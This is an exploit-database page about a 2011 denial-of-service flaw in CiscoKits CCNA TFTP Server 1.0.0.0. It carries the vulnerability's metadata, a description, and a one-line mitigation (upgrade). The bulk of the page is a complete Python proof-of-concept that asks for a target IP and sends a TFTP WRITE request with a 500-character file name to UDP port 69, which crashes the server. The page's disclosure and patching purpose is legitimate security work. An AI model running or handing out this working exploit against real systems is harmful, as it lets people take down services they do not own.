header-logo
Suggest Exploit
vendor:
CiscoKits CCNA TFTP Server
by:
Prabhu S Angadi
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: CiscoKits CCNA TFTP Server
Affected Version From: 1.0.0.0
Affected Version To: 1.0.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:certificationkits:cisco_ccna_tftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

CiscoKits CCNA TFTP Server Denial Of Service Vulnerability

CiscoKits CCNA TFTP Server version 1.0.0.0 is vulnerable to a denial of service attack. Sending a file name of more than 222 characters to the server via the WRITE or READ command will cause the server to crash.

Mitigation:

Upgrade to the latest version of CiscoKits CCNA TFTP Server.
Source

Exploit-DB raw data:

#!/usr/bin/python
##############################################################################
# Title    : CiscoKits CCNA TFTP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor   : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory : http://secpod.org/blog/?p=271
#            http://secpod.org/SECPOD_CiscoKits_CCNA_TFTP_DoS_POC.py
#            http://secpod.org/advisories/SECPOD_Ciscokits_CCNA_TFTP_DoS.txt
# Version  : CiscoKits CCNA TFTP Server 1.0.0.0
# Date     : 21/07/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

#File name >= 222 length leads to crash
exploit = "A" * 500

mode = "netascii"
print "File name WRITE crash"
# WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"
sock.sendto(data, (target, port))
time.sleep(5)